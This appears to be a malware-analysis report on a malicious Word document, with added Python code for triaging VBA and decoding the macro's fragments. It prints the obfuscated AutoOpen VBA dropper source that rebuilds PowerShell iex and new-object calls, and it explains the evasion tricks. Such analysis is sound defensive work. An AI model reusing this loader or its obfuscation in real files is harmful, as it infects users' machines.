Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 fb9fc26235d7b3f7…

MALICIOUS

Office (OLE)

Size: 131.5 KB
Created: 2018-02-12 09:29:00
Authoring application: Microsoft Office Word
First seen: 2018-02-19
MD5: bfdbff64acdad0e1446402d4160c552e
SHA-1: 28402dcc6a578e90e8f26f27ecc919a7dbb86d76
SHA-256: fb9fc26235d7b3f7465a6da2d0a60ebf395785372d06a16c9f558b773b0b2c01
Risk score: 302

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File
T1566.001 Phishing: Spearphishing Attachment

The sample is a Word document carrying a VBA project with an AutoOpen procedure. The extracted source holds two modules: ThisDocument (attributes only) and btGXzLIfLi, which contains AutoOpen. AutoOpen calls Application.Run "ULfEMDIR", rCJMNTapIB; VBA evaluates rCJMNTapIB() to supply that argument, and the function rebuilds a command line from Mid() slices of string literals that are padded with junk on both sides and spliced with filler tokens ("8TE+8TE", "aG2+aG2", "'+'"). The recovered slices are PowerShell: the fragment &( $vERboseprefEReNcE.tostriNg()[1,3]+'X' is the common way of spelling the Invoke-Expression alias iex without writing it (characters 1 and 3 of SilentlyContinue are i and e), and the string body is cleaned at run time with .REplaCE(([CHar]122+[CHar]102+[CHar]115),[StrinG][CHar]39) and .REplaCE('qXC',[StrinG][CHar]92), i.e. placeholders for the single quote and the backslash. The remaining statements, arithmetic on never-assigned variables under On Error Resume Next whose results are never read, are dead-code padding. The Shell() sink flagged below is not in the previewed part of the source; the report's assessment is that the rebuilt command line is run to download and execute a second-stage payload. The ClamAV detection Doc.Dropper.Agent-6446845-0 agrees with that dropper classification.

Heuristics (8)

  • ClamAV: Doc.Dropper.Agent-6446845-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-6446845-0
  • VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings)
    Document contains VBA macro code
  • Shell() call in VBA (critical, OLE_VBA_SHELL)
    Shell() call in VBA. The call is not in the previewed part of the extracted source; the visible AutoOpen reaches another procedure through Application.Run, passing the value of rCJMNTapIB(), the function that rebuilds the command line.
  • Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER)
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This loader shape keeps CreateObject/Shell/URL indicators out of the macro source. This sample is the junk-token variant: literals padded on both sides and spliced with filler tokens, cut back out with Mid().
  • AutoOpen macro (high, OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen. The rule's generic text assumes no modern VBA project was recovered and no stronger macro-virus family marker was present; for this sample a VBA project was recovered (see the extracted macros.bas below), so treat the marker as redundant evidence of the AutoOpen entry point, not as a downloader or parser-CVE attribution by itself.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the DrawingML XML namespace identifier present in any Word file that carries drawing parts; it is not a download or command-and-control address.
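Added example, not part of the report or of the scanner that produced it: a minimal Python triage of decoded VBA source that reproduces the reasoning behind the AutoOpen, Shell and obfuscated-loader heuristics above (auto-exec entry point, execution sinks, Mid() slices of junk-padded literals, write-only padding variables). The input is an abridged copy of the macro previewed further down (two literals shortened); the rule names, thresholds and function names are this example's own.

```python
import re

# Constructed input: abridged copy of the previewed macro (AutoOpen body plus
# two Mid() lines from rCJMNTapIB; the long literals are cut short).
SAMPLE_VBA = r'''Attribute VB_Name = "btGXzLIfLi"
Sub AutoOpen()
On Error Resume Next
oauuKfrid = zTVtIsGSdGSX - Sgn(NEpMNprwEzz) - (2370919 - Tan(2744206) / 9993227 - ChrW(RwpDKp))
Application.Run "ULfEMDIR", rCJMNTapIB
KGmrCtPIv = MSfPUNp - Sgn(iRHiXwCzbU) - (1397785 - Tan(2874928) / 596708 - ChrW(ESZXkslDADKtf))
End Sub
Function rCJMNTapIB()
On Error Resume Next
KtEbnwb = GtYsJlH + Mid(vADFtNAr + "DAzkK9+8TE+8TEoA9d = oA9+oA9&oA9+'+'oA9(zfsn" + BGuwRMIilB, 6, 165)
tXTUOiAJjw = kuCLVJEDzvdO + Mid(nPpBwULHil + "XT &( $vERboseprefEReNcE.tostriNg()[1,3]+'X'hCSdpZXNziOFlcp" + OlBviz, 3, 42)
End Function
'''

# Procedure names Word/Excel run without user interaction beyond opening the file.
AUTOEXEC_RE = re.compile(
    r"^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+"
    r"(AutoOpen|AutoExec|AutoClose|Auto_Open|Document_Open|Document_Close|Workbook_Open)\b",
    re.I | re.M)
# Execution / object-instantiation sinks worth reporting when they appear in source.
SINK_RE = re.compile(
    r"\b(Shell|CreateObject|GetObject|Application\.Run|WScript\.Shell|ShellExecute|URLDownloadToFile)\b",
    re.I)
# Mid(<name> + "<long literal>" + <name>, start, len): a literal padded with junk
# on both sides and cut back out at run time.
SLICED_LITERAL_RE = re.compile(
    r'\bMid\(\s*\w+\s*\+\s*"[^"]{20,}"\s*\+\s*\w+\s*,\s*\d+\s*,\s*\d+\s*\)', re.I)
ASSIGN_RE = re.compile(r"^\s*(\w+)\s*=", re.M)
ON_ERROR_RE = re.compile(r"^\s*On\s+Error\s+Resume\s+Next\s*$", re.I | re.M)


def scan_vba(src: str) -> dict:
    """Static triage of decoded VBA source; rule ids below are this example's own."""
    autoexec = sorted({m.group(1) for m in AUTOEXEC_RE.finditer(src)})
    sinks = sorted({m.group(1) for m in SINK_RE.finditer(src)})
    sliced = len(SLICED_LITERAL_RE.findall(src))
    # Variables assigned once and never read again: the arithmetic-on-nothing
    # lines exist only to bulk out the procedure and defeat simple scoring.
    write_only = sorted(
        name for name in set(ASSIGN_RE.findall(src))
        if len(re.findall(rf"\b{re.escape(name)}\b", src)) == 1)
    on_error = len(ON_ERROR_RE.findall(src))

    findings = []  # (severity, rule id, detail)
    if autoexec:
        findings.append(("high", "VBA_AUTOEXEC", ", ".join(autoexec)))
    if any(s.lower() == "shell" for s in sinks):
        findings.append(("critical", "VBA_SHELL", "Shell() call in source"))
    # Loader shape: auto-exec entry point + a sink + evidence of string rebuilding
    # or padding (thresholds chosen for this example, not taken from the report).
    if autoexec and sinks and (sliced >= 2 or len(write_only) >= 3):
        findings.append(("critical", "VBA_OBFUSCATED_AUTOEXEC_LOADER",
                         f"{sliced} sliced literals, {len(write_only)} write-only "
                         f"variables, sinks {sinks}"))
    return {"autoexec": autoexec, "sinks": sinks, "sliced_literals": sliced,
            "write_only_vars": write_only, "on_error_resume_next": on_error,
            "findings": findings}


if __name__ == "__main__":
    for sev, rule, detail in scan_vba(SAMPLE_VBA)["findings"]:
        print(f"[{sev}] {rule}: {detail}")
```

Note what the scan does not report: Shell is absent from the abridged input, so VBA_SHELL does not fire even though the report's OLE_VBA_SHELL does on the full 26 KB source. That is exactly the gap the loader heuristic is meant to cover, which is why it keys on the combination of entry point, any sink, and string-rebuilding evidence rather than on a Shell token alone.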

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 26732 bytes
SHA-256: bd11291b56399fb831defe163893dd74de44029c7f5106f8468d50b72479f54c
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "btGXzLIfLi"
Sub AutoOpen()
On Error Resume Next
oauuKfrid = zTVtIsGSdGSX - Sgn(NEpMNprwEzz) - (2370919 - Tan(2744206) / 9993227 - ChrW(RwpDKp))
aJnaPAiGM = BQrjqVTipmqu - Sgn(WhtssAi) - (3315296 - Tan(2903471) / 2610887 - ChrW(nuBlzpIqrKzvW))
TYvfKNXzf = RtVHpFiXlCwt - Sgn(UhjAizDKYlXZUE) - (9732246 - Tan(1269575) / 249057 - ChrW(tHFkrchTlJmL))
Application.Run "ULfEMDIR", rCJMNTapIB
tYacbwdNt = cisIwiVAjRkMFl - Sgn(kpESLOtYMszw) - (8472168 - Tan(5713343) / 28349 - ChrW(nztibrjiz))
zkZVbjSom = IZuiljGfQzjd - Sgn(jowPLGOs) - (1218591 - Tan(5013416) / 3745211 - ChrW(dUClLj))
KGmrCtPIv = MSfPUNp - Sgn(iRHiXwCzbU) - (1397785 - Tan(2874928) / 596708 - ChrW(ESZXkslDADKtf))
End Sub
Function rCJMNTapIB()
On Error Resume Next
iDXVFFskN = YYEJkQDCZknh - Sgn(DqqBbqa) - (2228222 - Tan(935644) / 3096206 - ChrW(AXFojQKXjQzWv))
zONpJPvK = UcKzRvNZataWH - Sgn(vbiT) - (1637255 - Tan(1971208) / 1720900 - ChrW(LOVJZQ))
wVzThcHjh = CDUuGGNPNnUjaw - Sgn(OKJDc) - (1526539 - Tan(7273027) / 6107636 - ChrW(llHRwb))
KtEbnwb = GtYsJlH + Mid(vADFtNAr + "DAzkK9+8TE+8TEoA9d = oA9+oA9&oA9+'+'oA9(zfsn'+'zfs+zfsoA9+aG2+aG2oA9e8TE+8TEzoA9+oAaG2+aG29fs+zoA9+oA9fsw-obo8TE+8TEA9+oA9jecoA9+oA9zfs+8TE+8TEzfsoA9+oA9tzoA9+oA8TE+8TE9fCnOPkaADkdXPBZ" + BGuwRMIilB, 6, 165)
mJwTMAOziuF = RXGIVzwTmfzj - Sgn(YXHiICuvUzaIDq) - (3568260 - Tan(9193650) / 3180523 - ChrW(wJmG))
HjjNTG = ATiBksf - Sgn(ouj) - (8622796 - Tan(5355635) / 8530955 - ChrW(rTttwYfAR))
UsQCb = dXVYA - Sgn(MRFHPdBJD) - (8018379 - Tan(9708660) / 7356495 - ChrW(UzqDnP))
sXcTYLFuKt = VzcXpGcA + Mid(hLR + "jG2+aG2+ sh9NSoA9+oA9BoA9+oaG28TE+8TE+aG2'+'A9 + 8TE+8TE(oA9+oA9zfs.exzf8TE+8T'+'EsaG8TE+8T'+'E2+aG28TE+8TE+zfsYppcqrMpohGDTw" + ndiRwALAWo, 2, 110)
zwJukFTP = KTHMnwQJ - Sgn(jjW) - (9788439 - Tan(8847012) / 9487755 - ChrW(USaBMjCD))
IkporiwSzim = bjPfUAb - Sgn(RJCTJzR) - (9413932 - Tan(1657159) / 6289607 - ChrW(aDus))
oNENWrwh = pSB - Sgn(HJiR) - (740584 - Tan(8925960) / 2320071 - ChrW(BdiiEC))
ZEMidKpiTAD = PsKsUSNrHUJ + Mid(nTWbWkNNS + "RfBldWAzWwFRtYqhP);break;oA98TE+8TEaG2+aG28TE+8TE+oA9}catch{}}oA9).REplaCE(([CH8TE+8TEa8TE+8TEr]1'+'22'+'+[CHar]102+[CHar]115),[StrinG][CHar]39).REplaCE(o'+'A9qXC'+'oA9,[StrinG][CHar]92).REplaaG2+aVrbLHVrP" + qGatmzMnUhJ, 18, 180)
qfFUqnluz = WBMHFnHj - Sgn(CGfWaffcmnhkjr) - (5051580 - Tan(1202867) / 1719755 - ChrW(wjHJYBXGNTj))
paaRWmQiLMw = CuSWJ - Sgn(zPp) - (6706837 - Tan(1147201) / 4866200 - ChrW(qQomK))
AsEWrFjQuZn = BwBKwqthdzT - Sgn(LwdlmRN) - (6515896 - Tan(4790969) / 1329489 - ChrW(zNdiAikiUDhiM))
tXTUOiAJjw = kuCLVJEDzvdO + Mid(nPpBwULHil + "XT &( $vERboseprefEReNcE.tostriNg()[1,3]+'X'hCSdpZXNziOFlcp" + OlBviz, 3, 42)
DvlYJmRzunL = wsQzOiRRkCwiS - Sgn(ldcz) - (6848099 - Tan(975807) / 3887508 - ChrW(HMvbTjIzn))
cFQVsSqTca = XWV - Sgn(AVBPLOUbZ) - (8139453 - Tan(1908239) / 1738807 - ChrW(abzjD))
KqITYAmP = VlDDnLhI - Sgn(OuLwjIdGvUt) - (1069391 - Tan(1617830) / 6176230 - ChrW(FRKaiWoSTwz))
oMnjOBDh = kVfPUVQ + Mid(QudfFdW + "JuNikJvhsVXlvdTE9+oA9C);&(oA8TE+8ozNQJttwCQtd" + cNuDDwTI, 15, 19)
QjVKKHMCfv = zaTHaD - Sgn(ZlBlDJdmlfT) - (8425714 - Tan(502970) / 4503946 - ChrW(RlDnOqjQfV))
JXBbSZMmpS = uUmlIXSQjoOoXh - Sgn(zfAUpOrT) - (1789913 - Tan(6541552) / 740355 - ChrW(ouqUWPFOIzA))
NiwLLALhEG = wZmqrCzf - Sgn(ssDQ) - (2047517 - Tan(6125935) / 7017367 - ChrW(Add))
QIQXPAwMB = wRODiGhMffNZA + Mid(UDPJTNFQwWBGaQ + "wmFWanoaG2+aG2A9+oA9iganNgGtEaG2+aG2oA9+oA9(), oA9+oA9'+'soA9+oA9h9oA9+8TE+8TEoA9SDoA8TE+8KhJDJVTXVjUpmmZpp" + brzjRjohQ, 5, 86)
TZQrpQIwA = LjUL - Sgn(VwRL) - (9058110 - Tan(3048833) / 25626 - ChrW(KXMnjuYm))
OoUGMmHNA = PICYWShEiUD - Sgn(jpwHEc) - (6758426 - Tan(2263644) / 2500323 - ChrW(MAFvNLt))
ujjHXZzHbs = HORZUM - Sgn(jzdkH) - (2497977 - Tan(9133619) / 9339270 - ChrW(iiOj))
ipZwEOFTjf = kdWqUsZ + Mid(SMw
... (truncated)
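The OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER heuristic above describes the loader shape; the following Python is an added worked decoding of three of the Mid() fragments quoted in the preview, not code from the report or from the sample. It assumes, from the fragments themselves, that "8TE+8TE", "aG2+aG2" and "'+'" are VBA-level filler (they cut through the other tokens, e.g. "oA8TE+8TE9" and "o'+'A9"), that "oA9" stands for the PowerShell single quote (it delimits 'qXC' in the visible .REplaCE() call), and that the two .REplaCE() calls in the third fragment are the ones the PowerShell applies to its string body. Function names are this example's own, and only the fragments that fit in the preview are decoded.

```python
import re

# The (literal, start, length) triples from three Mid() calls in rCJMNTapIB,
# copied verbatim from the extracted script above. The names concatenated
# around each literal (vADFtNAr, BGuwRMIilB, ...) are never assigned, so they
# are Empty and contribute nothing: Mid() sees the literal alone. The lengths
# check out: each slice ends exactly where the junk suffix begins.
FRAGMENTS = [
    ("XT &( $vERboseprefEReNcE.tostriNg()[1,3]+'X'hCSdpZXNziOFlcp", 3, 42),
    ("DAzkK9+8TE+8TEoA9d = oA9+oA9&oA9+'+'oA9(zfsn'+'zfs+zfsoA9+aG2+aG2oA9e8TE+8TEzoA9+oAaG2+aG29fs+zoA9+oA9fsw-obo8TE+8TEA9+oA9jecoA9+oA9zfs+8TE+8TEzfsoA9+oA9tzoA9+oA8TE+8TE9fCnOPkaADkdXPBZ", 6, 165),
    ("RfBldWAzWwFRtYqhP);break;oA98TE+8TEaG2+aG28TE+8TE+oA9}catch{}}oA9).REplaCE(([CH8TE+8TEa8TE+8TEr]1'+'22'+'+[CHar]102+[CHar]115),[StrinG][CHar]39).REplaCE(o'+'A9qXC'+'oA9,[StrinG][CHar]92).REplaaG2+aVrbLHVrP", 18, 180),
]

# Filler the VBA layer splices into the literals (assumption, see lead-in).
# "8TE+8TE" and "aG2+aG2" are inserted even inside the other tokens, so removal
# repeats until nothing changes. "oA9" is read as the PowerShell single quote.
VBA_FILLER = ("'+'", "8TE+8TE", "aG2+aG2")
QUOTE_PLACEHOLDER = "oA9"


def vba_mid(s: str, start: int, length: int) -> str:
    """VBA Mid(): 1-based start, at most `length` characters."""
    return s[start - 1:start - 1 + length]


def strip_vba_layer(s: str) -> str:
    """Undo the macro-side obfuscation of one slice."""
    prev = None
    while prev != s:
        prev = s
        for filler in VBA_FILLER:
            s = s.replace(filler, "")
    return s.replace(QUOTE_PLACEHOLDER, "'")


def join_ps_concat(s: str) -> str:
    """Resolve PowerShell 'a'+'b' concatenation of single-quoted chunks."""
    return s.replace("'+'", "")


CHAR_RE = re.compile(r"\[char\](\d+)", re.I)
REPLACE_RE = re.compile(
    r"\.replace\(\(?([^,]+?)\)?,\s*((?:\[string\])?\[char\]\d+|'[^']*')\)", re.I)


def ps_literal(expr: str) -> str:
    """Evaluate the two literal spellings the script uses: '...' and
    [CHar]N+[CHar]M..., optionally cast with [StrinG]."""
    expr = expr.strip()
    if len(expr) >= 2 and expr[0] == expr[-1] == "'":
        return expr[1:-1]
    return "".join(chr(int(n)) for n in CHAR_RE.findall(expr))


def ps_replace_pairs(code: str) -> list:
    """(placeholder, real text) pairs from the .REplaCE() chain in the code tail."""
    return [(ps_literal(a), ps_literal(b)) for a, b in REPLACE_RE.findall(code)]


def verbose_preference_trick() -> str:
    """$vERboseprefEReNcE.tostriNg()[1,3]+'X': $VerbosePreference defaults to
    SilentlyContinue, whose characters 1 and 3 are 'i' and 'e'; with 'X'
    appended that spells the Invoke-Expression alias without writing it. The
    closing part of that expression lies in a chunk the preview does not show."""
    pref = "SilentlyContinue"
    return pref[1] + pref[3] + "X"


def decode_fragments(fragments=FRAGMENTS) -> dict:
    """Run the three slices through both layers and report what falls out."""
    sliced = [vba_mid(lit, start, length) for lit, start, length in fragments]
    vba_out = [strip_vba_layer(s) for s in sliced]
    # Slice 3 is the code tail carrying the .REplaCE chain the PowerShell runs
    # over the assembled string; take its (placeholder, character) pairs ...
    pairs = ps_replace_pairs(vba_out[2])
    # ... and apply them to slice 2, a piece of the string body. The outer
    # 'a'+'b' joins are resolved first; after the placeholders are restored the
    # body contains a second level of joins ('n'+'e'+'w-objec'+'t').
    body = join_ps_concat(vba_out[1])
    for old, new in pairs:
        body = body.replace(old, new)
    return {"iex_call": vba_out[0], "replace_pairs": pairs,
            "body": body, "body_joined": join_ps_concat(body)}


if __name__ == "__main__":
    for key, value in decode_fragments().items():
        print(f"{key}: {value!r}")
```

The second slice decodes to a call of new-object; the stray characters at its edges ("9+'" in front, "zf" at the end) are chunk boundaries, since the real macro concatenates every slice before the filler is removed and the preview shows only a few of them. The third slice ends inside a filler token, so any .REplaCE() calls after the two recovered ones are not visible here.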